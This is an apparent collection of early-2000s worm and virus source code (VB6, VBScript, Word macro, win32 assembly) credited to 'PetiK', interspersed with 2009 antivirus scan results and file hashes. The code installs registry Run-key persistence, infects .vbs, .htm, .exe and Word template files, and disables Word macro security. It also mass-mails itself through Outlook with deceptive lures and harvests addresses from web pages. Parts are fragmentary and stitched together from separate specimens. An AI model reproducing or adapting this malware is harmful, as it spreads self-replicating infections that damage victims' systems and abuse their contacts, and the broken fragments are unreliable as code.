"Set ws=CreateObject(""WScript.Shell"")" & vbCrLf & vbCrLf & _
"pevb=""" & pefile & """" & vbCrLf & _
"read = dec(pevb)" & vbCrLf & _
"Set r = fso.CreateTextFile(fso.GetSpecialFolder(1) & ""\DebugW32.exe"", 2)" &
vbCrLf & _
"r.Write read" & vbCrLf & _
"r.Close" & vbCrLf & _
"ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug"",
fso.GetSpecialFolder(1) & ""\DebugW32.exe""" & vbCrLf
vbsf2 = "For each fil in fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).Files" &
vbCrLf & _
"ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _
"If ext <> ""vbs"" Then" & vbCrLf & _
"fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _
"End If" & vbCrLf & _
"For Each sf In fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).SubFolders" &
vbCrLf & _
"sprd(sf.Path)" & vbCrLf & _
"Next" & vbCrLf & _
"Next" & vbCrLf
vbsf3 = "Sub sprd(dir)" & vbCrLf & _
"For Each fil In fso.GetFolder(dir).Files" & vbCrLf & _
"ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _
"If ext <> ""vbs"" Then" & vbCrLf & _
"fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _
"Next" & vbCrLf & _
"For Each sf In fso.GetFolder(dir).SubFolders" & vbCrLf & _
"sprd(sf.Path)" & vbCrLf & _
"Next" & vbCrLf & _
"End Sub" & vbCrLf & vbCrLf & _
"Function dec(octe)" & vbCrLf & _
"For hexad = 1 To Len(octe) Step 2" & vbCrLf & _
"dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _
"Next" & vbCrLf & _
"End Function" & vbCrLf
vbsf4 = "Sub SprdOut()" & vbCrLf & _
"Set outl=CreateObject(""Outlook.Application"")" & vbCrLf & _
"For Each C In outl.GetNameSpace(""MAPI"").AddressLists" & vbCrLf & _
"If C.AddressEntries.Count <> 0 Then" & vbCrLf & _
"For dcnt=1 To C.AddressEntries.Count" & vbCrLf & _
"Set courrier=outl.CreateItem(0)" & vbCrLf & _
"courrier.To=C.AddressEntries(dcnt).Address" & vbCrLf & _
"courrier.Subject=""Important EMail for "" & C.AddressEntries(dcnt).Name" &
vbCrLf & _
"courrier.Body=""Look at this attached file, it may be important.""" & vbCrLf & _
"courrier.Attachments.Add(wScript.ScriptFullName)" & vbCrLf & _
"courrier.DeleteafterSubmit=True" & vbCrLf & _
"If courrier.To <> """" Then" & vbCrLf & _
"courrier.Send" & vbCrLf & _
"Next" & vbCrLf & _
"Next" & vbCrLf
Open vbfle For Output As #1
Print #1, vbsf
Print #1, vbsf2
Print #1, vbsf3
Print #1, vbsf4
Close #1
End Sub
Sub InfectExe(dir As String)

If fso.FolderExists(dir) Then
x = 0
For Each P In fso.GetFolder(dir).Files
ext = LCase(fso.GetExtensionName(P.Name))
nam = LCase(P.Name)
If ext = "exe" Then

If LCase(P.Name) <> "debugw32.exe" And (Right(LCase(P.Name), 9) <> "_vbpe.exe") Then
If Not fso.FileExists(P.Name & "_vbpe.exe") Then
FileCopy orig, dir & "\" & P.Name & "_vbpe.exe"
x = x + 1
End If
End If
End If
If x = 5 Then Exit For
Next
End If
End Sub
Sub srchmail(site As String)
Const INTERNET_OPEN_TYPE_DIRECT = 1
Const INTERNET_OPEN_TYPE_PROXY = 3
Const INTERNET_FLAG_RELOAD = &H80000000
Dim hOpen As Long, hFile As Long, sBuffer As String, Ret As Long
Dim mlto As String
sBuffer = Space(25000)
hOpen = InternetOpen(scUserAgent, INTERNET_OPEN_TYPE_DIRECT, vbNullString, vbNullString,
0)
hFile = InternetOpenUrl(hOpen, site, vbNullString, ByVal 0&, INTERNET_FLAG_RELOAD, ByVal
0&)
InternetReadFile hFile, sBuffer, 25000, Ret
InternetCloseHandle hFile
InternetCloseHandle hOpen
For j = 1 To Len(sbufr)
If Mid(sBuffer, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(sBuffer, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(sBuffer, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call SendMail(mlto)
End If
Next
End Sub
Sub SendMail(email As String)

Dim out
mel.To = email
mel.Subject = "Congratulations for your site"
mel.Body = "Congratulations for your site" & vbCrLf & _
"This is a good tool to improve it." & vbCrLf & vbCrLf & _
"Best Regards."
mel.Attachments.Add orig, 1, 1, "WebMakeFullInstall.exe"
mel.Send
map.Logoff
Set out = Nothing
End Sub
File WormMars.exe received on 05.16.2009 19:58:38 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Mars!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Mars.worm.12800
AntiVir 7.9.0.168 2009.05.15 Worm/Mars.3
Authentium 5.1.2.4 2009.05.16 W32/Gubed.A@mm
Avast 4.8.1335.0 2009.05.15 Win32:Gubed
AVG 8.5.0.336 2009.05.15 I-Worm/Mars
BitDefender 7.2 2009.05.16 Win32.Mars.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Mars
ClamAV 0.94.1 2009.05.16 Worm.Mars
Comodo 1157 2009.05.08 Worm.Win32.Mars.A
eSafe 7.0.17.0 2009.05.14 Win32.Mars
eTrust-Vet 31.6.6508 2009.05.16 Win32/Gubed
F-Prot 4.4.4.56 2009.05.16 W32/Gubed.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Mars
Fortinet 3.117.0.0 2009.05.16 W32/Gubed.A@mm
GData 19 2009.05.16 Win32.Mars.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Mars
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Mars
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Mars
McAfee 5616 2009.05.15 W32/Gubed@MM
McAfee+Artemis 5616 2009.05.15 W32/Gubed@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Mars.3
Microsoft 1.4602 2009.05.16 Worm:Win32/Gubed.A@mm
NOD32 4080 2009.05.15 Win32/Mars.A
Norman 6.01.05 2009.05.16 Gubed.A@mm
nProtect 2009.1.8.0 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 Email-Worm.Mars!sd5
Rising 21.29.52.00 2009.05.16 Worm.Mail.Mars.a
Sophos 4.41.0 2009.05.16 W32/Mars-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Magistr.a.poly
Symantec 1.4.4.12 2009.05.16 W32.Gubed.int
TheHacker 6.3.4.1.326 2009.05.15 Trojan/Hami
TrendMicro 8.950.0.1092 2009.05.15 WORM_GUBED.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Mars
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Mars.12800
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petgub.A
MD5...: 1b81a0863eafb1a4b260df5c7c1d8621
SHA1..: 7c218fa9d30d54966f472e6703123d13e38152f1
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : W32.HLLW.DocTor
' Author : PetiK
' Date : 22/06/2002

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As
Any, ByVal ByteLen As Long)
Private Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName
As String) As Long
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long)
As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

cb As Long
abID As Byte
End Type
mkid As SHITEMID
End Type
Public docv As String
Sub Main()
org = App.Path & "\" & App.EXEName & ".exe"
If InStr(1, GetCommLine, "/newrun") = 0 Then
docv = "C:\"
Randomize (Timer)
For i = 1 To 8
docv = docv & Chr(Int(Rnd(1) * 26) + 97)
Next i
docv = docv & ".txt"
Call Install
Call DocVir
Call VbsDrop
Else
Sleep 20000
DeleteFile GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
chkinet:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo chkinet
x = 1
ml.Recipients.Add e
x = x + 1
Next oo
mel.Subject = "NewTool for Word Macro Virus"
mel.Body = "This tool allows you to protect you against unknown macro virus." & vbCrLf &
_
"Click on the attached file to run this freeware." & vbCrLf & vbCrLf & _
"Best Regards. Have a nice day"
mel.Attachments.Add orig, 1, 1, "DocTor.exe"
mel.Send
e = ""
Next y
map.Logoff
End If
End If
End Sub
Sub Install()
org = App.Path & "\" & App.EXEName & ".exe"

cop = fso.GetSpecialfolder(0) & "\Doctor.exe"
copreg = fso.GetSpecialfolder(0) & "\Doctor.exe /newrun"
FileCopy org, cop

ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", copreg
End Sub
Sub DocVir()
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
Open orig For Binary As #1

DoEvents
Do While Not EOF(1)
DoEvents
Get #1, , bbyte
e = Hex(bbyte)
If Len(e) = 1 Then e = "0" & Hex(bbyte)
pefile = pefile & e
Loop
Close #1
hexf = "pef = """

For i = 1 To Len(pefile) Step 110
hexf = hexf & Mid(pefile, i, 110) & """" & vbCrLf & "pef = pef & """
Next
hexf = hexf & """" & vbCrLf
inst = "read = dec(pef)" & vbCrLf & _

"Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & ""\Doctor.exe"", 2)" &
vbCrLf & _
"r.Write read" & vbCrLf & _
"r.Close" & vbCrLf & _
"ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor"",
fso.GetSpecialFolder(0) & ""\Doctor.exe /newrun"""
conv = "Function dec(octe)" & vbCrLf & _
"For hexad = 1 To Len(octe) Step 2" & vbCrLf & _
"dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _
"Next" & vbCrLf & _
"End Function" & vbCrLf
infwrd = "Set doc = ActiveDocument.VBProject.VBComponents(1)" & vbCrLf & _

"Set nor = NormalTemplate.VBProject.VBComponents(1)" & vbCrLf & _
"With Options" & vbCrLf & _
".ConfirmConversions = False" & vbCrLf & _
".VirusProtection = False" & vbCrLf & _
".SaveNormalPrompt = False" & vbCrLf & _
"End With" & vbCrLf & _
"Select Case Application.Version" & vbCrLf & _
"Case ""10.0""" & vbCrLf & _
"System.PrivateProfileString("""",
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&" &
vbCrLf & _
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
& vbCrLf & _
"Case ""9.0""" & vbCrLf & _
""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&" &
vbCrLf & _
"End Select" & vbCrLf & _
"WordBasic.DisableAutoMacros 0" & vbCrLf & vbCrLf & _
"If nor.Name <> ""DocTor"" Then"
infwrd2 = "install doc, nor" & vbCrLf & _
"If doc.Name <> ""DocTor"" Then" & vbCrLf & _
"install nor, doc" & vbCrLf & _
"Activedocument.Save" & vbCrLf & _
"End If"
instal = "Private Sub install(src, dst)" & vbCrLf & _

"Set odst = dst.CodeModule" & vbCrLf & _
"Set osrc = src.CodeModule" & vbCrLf & _
"odst.DeleteLines 1, odst.CountOfLines" & vbCrLf & _
"odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines)" & vbCrLf & _
"End Sub" & vbCrLf
Open docv For Output As #1

Print #1, "Private Sub Document_Open()"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set ws=CreateObject(""WScript.Shell"")" & vbCrLf
Print #1, hexf
Print #1, infwrd
Print #1, inst
Print #1, infwrd2
Print #1, "End Sub" & vbCrLf
Print #1, instal
Print #1, conv
Close #1
End Sub
Sub VbsDrop()
vbsdrp = GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
vbs = "On Error Resume Next" & vbCrLf & _

"set fso=createobject(""scripting.filesystemobject"")" & vbCrLf & _
"set ws=createobject(""wscript.shell"")" & vbCrLf & _
"Set wrd=createObject(""Word.Application"")" & vbCrLf & _
"wrd.options.virusprotection=0" & vbCrLf & _
"wrd.options.savenormalprompt=0" & vbCrLf & _
"wrd.options.confirmconversions=0" & vbCrLf & _
"ws.regwrite
""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"",1,""REG_DWORD"""
& vbCrLf & _
"ws.regwrite
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"",1,""REG_DWORD"""
& vbCrLf & _
"ws.regwrite
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"",1,""REG_DWO
RD""" & vbCrLf & _
"If wrd.normaltemplate.vbproject.vbcomponents(1).name <> ""DocTor"" then" &
vbCrLf & _
"wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromfile(""" & docv &
""")" & vbCrLf & _
"wrd.normaltemplate.vbproject.vbcomponents(1).name=""DocTor""" & vbCrLf & _
"wscript.sleep 500" & vbCrLf & _
"fso.deletefile """ & docv & """" & vbCrLf & _
"wrd.application.quit"
Open vbsdrp For Output As #1

Print #1, vbs
Close #1
End Sub
Private Function GetCommLine() As String

Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine
SLen = lstrlen(RetStr)
If SLen > 0 Then
GetCommLine = Space$(SLen)
CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
End If
End Function

Dim r As Long
If r = NOERROR Then
Path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
End Function
VBA Word Part
Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Private Sub Document_Open()
pef = "4D5A900000000000..."
pef = pef & "0000000000C00000..."
pef = pef & "53206D6F64652E0D..."
pef = pef & "2AAA88526963689D..."
pef = pef & "00000000000000"
pef = pef & ""
Set doc = ActiveDocument.VBProject.VBComponents(1)

Set nor = NormalTemplate.VBProject.VBComponents(1)
With Options
End With
Case "10.0"
Case "9.0"
End Select
If nor.Name <> "DocTor" Then

read = dec(pef)
Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & "\Doctor.exe", 2)
r.Write read
r.Close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor",
fso.GetSpecialFolder(0) & "\Doctor.exe /newrun"
install doc, nor
End If
If doc.Name <> "DocTor" Then
install nor, doc
ActiveDocument.Save
End If
End Sub
Private Sub install(src, dst)

Set odst = dst.CodeModule
Set osrc = src.CodeModule
odst.DeleteLines 1, odst.CountOfLines
odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines)
End Sub
Function dec(octe)
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
End Sub
File DocTor.exe received on 05.16.2009 11:30:42 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Dotor!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Dotor.worm.11776
AntiVir 7.9.0.168 2009.05.15 Worm/Dotor.1
Authentium 5.1.2.4 2009.05.15 W32/Dotor.A
Avast 4.8.1335.0 2009.05.15 Win32:Dotor
AVG 8.5.0.336 2009.05.15 I-Worm/Dotor
BitDefender 7.2 2009.05.16 Win32.Dotor.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Dotor
ClamAV 0.94.1 2009.05.15 Worm.Dotor
Comodo 1157 2009.05.08 Worm.Win32.DoTor.A
eSafe 7.0.17.0 2009.05.14 Win32.Doctor
eTrust-Vet 31.6.6508 2009.05.16 Win32/Dotor
F-Prot 4.4.4.56 2009.05.15 W32/Dotor.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Dotor
Fortinet 3.117.0.0 2009.05.16 W32/Dotor.A!worm
GData 19 2009.05.16 Win32.Dotor.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Dotor
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Dotor
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Dotor
McAfee 5616 2009.05.15 W32/DoTor@MM
McAfee+Artemis 5616 2009.05.15 W32/DoTor@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Doctor.4
Microsoft 1.4602 2009.05.16 Worm:Win32/Dotor.A@mm
NOD32 4080 2009.05.15 Win32/DoTor.A
Norman 6.01.05 2009.05.16 Dotor.A@mm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Dotor.A
PCTools 4.4.2.0 2009.05.15 Email-Worm.Dotor!sd5
Rising 21.29.52.00 2009.05.16 Worm.Mail.Dotor.a
Sophos 4.41.0 2009.05.16 W32/Dotor-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Dotor.A@mm
Symantec 1.4.4.12 2009.05.16 W32.Dotor.A@mm
TheHacker 6.3.4.1.326 2009.05.15 W32/Dotor
TrendMicro 8.950.0.1092 2009.05.15 WORM_DOTOR.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Dotor
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Pettor.A
MD5...: 76ff0b311e26f1322c63023c30c54549
SHA1..: 143baa09884c13cd59eb048f756954e5a6d2bc6d
File DocTor.doc received on 05.16.2009 11:30:41 (CET)
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Dotor
AntiVir 7.9.0.168 2009.05.15 W2000M/Bumdoc.A
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Dotor
Authentium 5.1.2.4 2009.05.15 W97M/Dotor.A
Avast 4.8.1335.0 2009.05.15 MW97:Dotor-A
AVG 8.5.0.336 2009.05.15 W97M/Bumdoc
BitDefender 7.2 2009.05.16 W97M.Dotor.A
CAT-QuickHeal 10.00 2009.05.15 W97M.Ethan
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 W97M.Doctor
eSafe 7.0.17.0 2009.05.14 O97M.GNinducc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Dotor.A
F-Prot 4.4.4.56 2009.05.15 W97M/Dotor.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Dotor
Fortinet 3.117.0.0 2009.05.16 W97M/Dotor.A
GData 19 2009.05.16 W97M.Dotor.A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Dotor
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Bumdoc.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Dotor.A
NOD32 4080 2009.05.15 W97M/Dotor.A
Norman 6.01.05 2009.05.16 W97M/Dotor.A
nProtect 2009.1.8.0 2009.05.16 W97M.Dotor.A
Panda 10.0.0.14 2009.05.15 W97M/Dotor.A
PCTools 4.4.2.0 2009.05.15 WORD.97.Pettor.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Micro Virus
Sophos 4.41.0 2009.05.16 WM97/Dotor-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Dotor.A (v)
Symantec 1.4.4.12 2009.05.16 W97M.Dotor.A@mm
TrendMicro 8.950.0.1092 2009.05.15 W97M_DOTOR.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Dotor
ViRobot 2009.5.15.1737 2009.05.15 W97M.Dotor.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Pettor.A
MD5...: 762645157dbc893c564928edfed2413b
SHA1..: 66a67434fd6e3771666e4adaa28fd9b481f2b4bc
' Name : VBS.Park
' Author : PetiK
' Language : VBS
' Date : 24/06/2002
Set fs=CreateObject("Scripting.FileSystemObject")
Set fl=fs0.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close
f="virhex="""
For i=1 to Len(virus)

e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f & e
Next
f=f & """"

For each drv in fs.Drives
If drv.DriveType=2 or drv.DriveType=3 Then
list(drv.path&"\")
End If
Next
Sub list(dir)
For each ssf in fs.GetFolder(dir).SubFolders
infect(ssf.path)
list(ssf.path)
Next
End Sub
Sub infect(dir)
For each fil in fs.GetFolder(dir).Files
ext=lcase(fs.GetExtensionName(fil.path))
If ext="vbs" Then
Set vb=fs.OpenTextFile(Q.path,1)
If vb.ReadLine <> ""'VBS.Park"" Then
vbsorg=vb.ReadAll()
vb.Close
Set vb=fs.OpenTextFile(Q.path,2)
vb.WriteLine read(virhex)
vb.WriteLine vbsorg
vb.Close
Else
vb.Close
End If
ElseIf ext="htm" or ext="html" Then
Set ht=fs.OpentextFile(P.path,1)
htmf=ht.ReadAll
ht.Close
If InStr(1,htmf,"virhex",1) = 0 Then
Set ht=fs.OpentextFile(P.path,8)
ht.WriteBlankLines(2)
ht.WriteLine "<SCRIPT LANGUAGE=VBScript>"
ht.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
ht.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
ht.WriteLine f
ht.WriteLine "Infect(fso.GetSpecialFolder(0))"
ht.WriteLine "Infect(""C:\"")"
ht.WriteLine "Infect(ws.SpecialFolders(""MyDocuments""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Desktop""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Favorites""))"
ht.WriteLine "Sub Infect(dir)"
ht.WriteLine "For each Q in fs.GetFolder(dir).Files"
ht.WriteLine "ext=lcase(fs.GetExtensionName(Q.Name))"
ht.WriteLine "If ext=""vbs"" Then"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,1)"
ht.WriteLine "If vb.ReadLine <> ""'VBS.Park"" Then"
ht.WriteLine "vbsorg=vb.ReadAll()"
ht.WriteLine "vb.Close"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,2)"
ht.WriteLine "vb.WriteLine read(virhex)"
ht.WriteLine "vb.WriteLine vbsorg"
ht.WriteLine "Else"
ht.WriteLine "End If"
ht.WriteLine "If ext=""htm"" or ext=""html"" Then"
ht.WriteLine "Set ht=fs.OpenTextFile(Q.Path,1)"
ht.WriteLine "If ht.ReadLine <> ""<vbshtmpark>"" Then"
ht.WriteLine "htmorg=ht.ReadAll()"
ht.WriteLine "ht.Close"
ht.WriteLine "Set ht=fs.CreateTextFile(Q.Path,2)"
ht.WriteLine "ht.WriteLine ""<vbshtmpark>"""
ht.WriteLine "ht.Write(htmorg)"
ht.WriteLine "ht.WriteLine document.body.CreateTextRange.htmltext"
ht.WriteLine "Else"
ht.WriteLine "Next"
ht.WriteLine "End Sub"
ht.WriteLine "Function read(octet)"
ht.WriteLine "For hexa=1 To Len(octet) Step 2"
ht.WriteLine "read=read & Chr(""&h"" & Mid(octet, hexa, 2))"
ht.WriteLine "Next"
ht.WriteLine "End Function"
ht.WriteLine "</SCRIPT>"
ht.Close
End If
End If
Next
End Sub
File Park.vbs received on 05.16.2009 18:00:31 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 VBS/Park
AntiVir 7.9.0.168 2009.05.15 Worm/Alcaul.U3
Authentium 5.1.2.4 2009.05.16 VBS/Park.A
AVG 8.5.0.336 2009.05.15 VBS/Park
BitDefender 7.2 2009.05.16 VBS.Park.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Park!intended
F-Prot 4.4.4.56 2009.05.16 VBS/Park.A
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.A
GData 19 2009.05.16 VBS.Park.A
K7AntiVirus 7.10.737 2009.05.16 -
McAfee 5616 2009.05.15 VBS/Park.b.intd
McAfee+Artemis 5616 2009.05.15 VBS/Park.b.intd
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Alcaul.U3
Microsoft 1.4602 2009.05.16 Virus:VBS/Park.gen
Norman 6.01.05 2009.05.16 VBS/Petik.H
nProtect 2009.1.8.0 2009.05.16 VBS.Intended.Park.A
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 VBS.Park.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Dara
Sophos 4.41.0 2009.05.16 Junk/Park-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Dara
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_Parade.a
ViRobot 2009.5.15.1737 2009.05.15 VBS.Park
VirusBuster 4.6.5.0 2009.05.16 VBS.Park.A
MD5...: cfa6d1d7f6e6223bfdf9ae6350cc05b0
SHA1..: 8d988bc367ce0b20adcc177f2b73764a233d77cb
comment *
Name : Worm.dilan aka adlin aka linda
Author : PetiK
Date : June 26th 2002
Language : win32asm
Spread via HTML file and infected other HTM/HTML files in these folders:
- WINDOWS
- WINDOWS\SYSTEM
- WINDOWS\TEMP
- DESKTOP
- MY DOCUMENTS
.586p
.model flat
.code
JUMPS
include useful.inc
include win32api.inc
api macro a
extrn a:proc
call a
endm
start: pushad
@SEH_SetupFrame <jmp end_worm>
get_name:
push 50
push esi
push 0
get_copy_name:
push edi
push 50
push edi
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi
copy_worm:
push 0
push edi
push esi
api CopyFileA
push 50
push edi
push 1
@pushsz "ScanW32"
push 80000002h
api SHSetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset cpywrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax
scan_mail:
xor edx,edx
mov edi,offset hex_f
push edi
p_c: lodsb
call conv_hex
stosw
car_s: dec size
cmp size,0
jne p_c
entr1: xor al,al
stosb
pop edi
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
push 0
push 5
push offset mydoc
push 0
@pushsz "\dilan.htm"
push offset mydoc
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset mydoc
api CreateFileA
mov [hhtm],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hhtm]
api WriteFile
push [hhtm]
api CloseHandle
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI
XOR ECX, ECX

MOV CL, AL
PUSH ECX
SHR CL, 04h
LEA EDI, Tab_Hex
INC CL
@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL
@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET
.data
mydoc db 70 dup (0)
hhtm dd ?
byte dd 0
size dd ?
Tab_Hex db "0123456789ABCDEF", 00h
s_htm: db '<dilan>',CRLF
db '<html><head><title>Only For You!</title></head><body>',CRLF
db '<script language=vbscript>',CRLF
db 'Set fso=createobject("scripting.filesystemobject")',CRLF
db 'Set ws=createobject("wscript.shell")',CRLF
db 'If err.number=429 then',CRLF
db 'document.write "<font face size=''4'' color=black>You need ActiveX enabled to
see this file<br>'
db '<a href=''javascript:location.reload()''>Click Here</a> to reload and CLICK
YES</font>"',CRLF
db 'Else',CRLF
db 'asmhex="'
hex_f db 1024 * 13 dup (0)
db '"',CRLF
db 'read = dec(asmhex)',CRLF
db 'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)',CRLF
db 'r.Write read',CRLF
db 'r.Close',CRLF
db 'ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc
anner.exe"',CRLF,CRLF
db 'infect(fso.GetSpecialFolder(0))',CRLF
db'infect(fso.GetSpecialFolder(1))',CRLF
db'infect(fso.GetSpecialFolder(2))',CRLF
db'infect(ws.SpecialFolders("MyDocuments"))',CRLF
db'infect(ws.SpecialFolders("Desktop"))',CRLF,CRLF
db'MsgBox "Sorry but your browser can''t read this Web file."',CRLF
db'End If',CRLF,CRLF
db'Function infect(dir)',CRLF
db'If fso.FolderExists(dir) Then',CRLF
db'For each cible in fso.GetFolder(dir).Files',CRLF
db'ext=lcase(fso.GetExtensionName(cible.Name))',CRLF
db'If ext="htm" or ext="html" Then',CRLF
db'Set gd=fso.OpenTextFile(cible.path,1)',CRLF
db'If gd.readline <> "<dilan>" Then',CRLF
db'htmorg=gd.Readall',CRLF
db'gd.Close',CRLF
db'Set gd=fso.OpenTextFile(cible.path,2)',CRLF
db'gd.WriteLine "<dilan>"',CRLF
db'gd.Write(htmorg)',CRLF
db'gd.WriteLine document.body.createtextrange.htmltext',CRLF
